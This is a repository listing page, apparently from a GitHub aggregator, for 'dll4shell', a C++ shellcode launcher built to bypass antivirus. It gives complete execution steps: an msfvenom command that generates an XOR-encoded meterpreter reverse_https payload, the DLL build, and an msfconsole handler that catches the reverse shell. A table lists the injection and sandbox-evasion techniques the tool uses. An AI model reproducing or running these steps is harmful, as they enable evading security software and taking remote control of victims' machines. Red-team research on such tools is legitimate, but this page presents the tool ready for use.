cepxeo/dll4shell cepxeo/dll4shell

  • Stars
    star
    216
  • Rank 183,179 (Top 4 %)
  • Language
    C++
  • Created almost 3 years ago
  • Updated 11 months ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
cepxeo/dll4shell
github

cepxeo

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Shellcode launcher for AV bypass

C++ shellcode launcher

A collection of DLL wrappers around various shellcode injection and obfuscation techniques. Based on the charlotte tool.

Execution steps

git clone https://github.com/cepxeo/dll4shell && cd dll4shell
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=YOUR_IP LPORT=443 EXITFUNC=thread -f raw -e x64/xor_dynamic -a x64 -o beacon.bin

sudo apt install mingw-w64

python dll4shell.py -e xor -o dll

sudo msfconsole -q -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_https; set LHOST YOUR_IP; set LPORT 8443; exploit"

Techniques used (-e parameter):

Value Obfuscation method, Details Injection type Code invocation
xor XOR Local VirtualAlloc, CreateThread
xor1 XOR, sandbox evasion Remote VirtualAllocEx, CreateRemoteThread
xor2 XOR, sandbox evasion Local hHeapAlloc, hCreateThread
shift Cezar Local VirtualAlloc, CreateThread
shift1 Cezar, sandbox evasion Remote VirtualAllocEx, CreateRemoteThread

Outputs (-o parameter):

Value Details
dll DLL callable via rundll32
xll XLL callable via Add-Ins
payload save encrypted payload only

More Repositories

1

pentest_notes

11
star
2

scansuite

Shell
6
star
3

c2-terraform

C2 deployment with Terraform
HCL
5
star
4

PocketSIEM

Lightweight event log collector and visualizer
Python
5
star
5

redteambins

Compiled binaries and ready code for Red Teaming
PowerShell
4
star
6

SQLServerEx

Yet another MS SQL Server exploitation tool
C#
3
star
7

presentations

Presentations materials
2
star
8

terraform-aws-jenkins

Jenkins deployment on AWS
HCL
1
star
9

linux-suggester

Local host enumeration script
Python
1
star